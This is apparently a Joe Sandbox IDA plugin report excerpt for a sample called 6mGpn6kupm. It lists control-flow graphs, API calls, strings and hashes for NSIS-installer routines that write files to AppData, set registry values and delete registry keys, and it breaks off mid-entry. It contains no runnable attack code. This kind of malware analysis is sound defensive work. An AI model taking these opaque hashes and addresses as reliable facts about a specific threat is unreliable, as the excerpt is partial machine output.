                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-1230650788
                                                                                                              • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 662 4017dd-4017ef 654->662 663 4017cd-4017db CompareFileTime 654->663 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 662->655 663->662 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 701 401864-401865 667->701 678 401882-401888 668->678 682 402ace 678->682 680->681 684 4018d0-4018db CloseHandle 680->684 681->684 688 402ad0-402ad4 682->688 686 4018e1-4018e4 684->686 687 402ac5-402ac8 684->687 690 4018e6-4018f7 call 40640a lstrcatW 686->690 691 4018f9-4018fc call 40640a 686->691 687->682 695 401901-4022fc call 405a4e 690->695 691->695 695->688 701->678 703 401867-401868 701->703 703->668
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Bargains,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Bargains,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Bargains$C:\Users\user\AppData\Local\Temp\nsvC041.tmp$C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dll$Call
                                                                                                              • API String ID: 1941528284-708030421
                                                                                                              • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 711 402ace-402ad4 707->711 709 402672 708->709 710 402675-402678 708->710 709->710 712 4027dc-4027e4 710->712 713 40267e-40268d call 406348 710->713 712->707 713->712 717 402693 713->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->712 723 4026c4-4026c9 720->723 721->722 724 40273c-402747 call 405fbf 721->724 722->712 733 40275f 722->733 723->712 726 4026cf-4026dd 723->726 724->712 724->722 729 4026e3-4026f5 MultiByteToWideChar 726->729 730 402798-4027a4 call 40632f 726->730 729->733 734 4026f7-4026fa 729->734 730->711 736 402762-402765 733->736 737 4026fc-402707 734->737 736->730 738 402767-40276c 736->738 737->736 739 402709-40272e SetFilePointer MultiByteToWideChar 737->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->737 742 402730 739->742 743 4027ca-4027d6 SetFilePointer 740->743 744 4027af-4027b3 740->744 741->740 745 402775-402788 741->745 742->733 743->712 746 4027b5-4027b9 744->746 747 4027bb-4027c8 744->747 745->712 748 40278a-402790 745->748 746->743 746->747 747->712 748->718 749 402796 748->749 749->712
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 755 40678c-4067bf wsprintfW LoadLibraryExW 753->755 754->753 756 406785-406787 754->756 756->755
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 757 40591f-40596a CreateDirectoryW 758 405970-40597d GetLastError 757->758 759 40596c-40596e 757->759 760 405997-405999 758->760 761 40597f-405993 SetFileSecurityW 758->761 759->760 761->759 762 405995 GetLastError 761->762 762->760
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 3449924974-3080008178
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 763 701c1777-701c17b6 call 701c1b5f 767 701c17bc-701c17c0 763->767 768 701c18d6-701c18d8 763->768 769 701c17c9-701c17d6 call 701c2394 767->769 770 701c17c2-701c17c8 call 701c2352 767->770 775 701c17d8-701c17dd 769->775 776 701c1806-701c180d 769->776 770->769 779 701c17df-701c17e0 775->779 780 701c17f8-701c17fb 775->780 777 701c182d-701c1831 776->777 778 701c180f-701c182b call 701c2569 call 701c15b4 call 701c1272 GlobalFree 776->778 784 701c187e-701c1884 call 701c2569 777->784 785 701c1833-701c187c call 701c15c6 call 701c2569 777->785 800 701c1885-701c1889 778->800 782 701c17e8-701c17e9 call 701c2aac 779->782 783 701c17e2-701c17e3 779->783 780->776 786 701c17fd-701c17fe call 701c2d37 780->786 795 701c17ee 782->795 788 701c17e5-701c17e6 783->788 789 701c17f0-701c17f6 call 701c2724 783->789 784->800 785->800 798 701c1803 786->798 788->776 788->782 804 701c1805 789->804 795->798 798->804 805 701c188b-701c1899 call 701c252c 800->805 806 701c18c6-701c18cd 800->806 804->776 813 701c189b-701c189e 805->813 814 701c18b1-701c18b8 805->814 806->768 811 701c18cf-701c18d0 GlobalFree 806->811 811->768 813->814 815 701c18a0-701c18a8 813->815 814->806 816 701c18ba-701c18c5 call 701c153d 814->816 815->814 817 701c18aa-701c18ab FreeLibrary 815->817 816->806 817->814
                                                                                                              APIs
                                                                                                                • Part of subcall function 701C1B5F: GlobalFree.KERNEL32(?), ref: 701C1DB2
                                                                                                                • Part of subcall function 701C1B5F: GlobalFree.KERNEL32(?), ref: 701C1DB7
                                                                                                                • Part of subcall function 701C1B5F: GlobalFree.KERNEL32(?), ref: 701C1DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C1825
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 701C18AB
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C18D0
                                                                                                                • Part of subcall function 701C2352: GlobalAlloc.KERNEL32(00000040,?), ref: 701C2383
                                                                                                                • Part of subcall function 701C2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701C17F6,00000000), ref: 701C27F4
                                                                                                                • Part of subcall function 701C15C6: wsprintfW.USER32 ref: 701C15F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                              • Opcode ID: f0a12cde1c2364ac89959d9672e8f532774231f223ea72288b7754d736bb7da1
                                                                                                              • Instruction ID: 5a5086e16e8ca9b9f55261a70f0084783fc9a43fed5faa0f6430f6aad91cc326
                                                                                                              • Opcode Fuzzy Hash: f0a12cde1c2364ac89959d9672e8f532774231f223ea72288b7754d736bb7da1
                                                                                                              • Instruction Fuzzy Hash: 7141A0724442459BDB119F60DC85B9F3BA8BB36310F264079FD079AA8ADBB8D485CB60

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 820 4023e4-402415 call 402c41 * 2 call 402cd1 827 402ac5-402ad4 820->827 828 40241b-402425 820->828 829 402427-402434 call 402c41 lstrlenW 828->829 830 402438-40243b 828->830 829->830 833 40243d-40244e call 402c1f 830->833 834 40244f-402452 830->834 833->834 838 402463-402477 RegSetValueExW 834->838 839 402454-40245e call 4031d6 834->839 840 402479 838->840 841 40247c-40255d RegCloseKey 838->841 839->838 840->841 841->827 845 40288b-402892 841->845 845->827
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvC041.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseValuelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvC041.tmp
                                                                                                              • API String ID: 2655323295-3820978396
                                                                                                              • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                              • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 846 405f0d-405f19 847 405f1a-405f4e GetTickCount GetTempFileNameW 846->847 848 405f50-405f52 847->848 849 405f5d-405f5f 847->849 848->847 850 405f54 848->850 851 405f57-405f5a 849->851 850->851
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-386316673
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 852 402d44-402d6d call 406255 854 402d72-402d74 852->854 855 402d76-402d7c 854->855 856 402dec-402df0 854->856 857 402d98-402dad RegEnumKeyW 855->857 858 402d7e-402d80 857->858 859 402daf-402dc1 RegCloseKey call 4067c2 857->859 860 402dd0-402dde RegCloseKey 858->860 861 402d82-402d96 call 402d44 858->861 866 402de0-402de6 RegDeleteKeyW 859->866 867 402dc3-402dce 859->867 860->856 861->857 861->859 866->856 867->856
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Bargains,?,00000000,000000F0), ref: 0040164D
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Iw\Bargains, xrefs: 00401640
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Bargains
                                                                                                              • API String ID: 1892508949-2976193113
                                                                                                              • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                              • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
